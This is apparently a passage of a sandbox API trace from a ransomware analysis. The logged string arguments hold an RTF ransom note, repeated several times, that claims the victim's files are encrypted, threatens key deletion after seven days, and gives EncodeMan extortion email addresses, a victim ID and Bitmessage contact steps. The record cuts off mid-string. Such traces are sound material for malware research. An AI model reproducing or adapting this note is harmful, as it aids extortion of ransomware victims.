th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.736] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 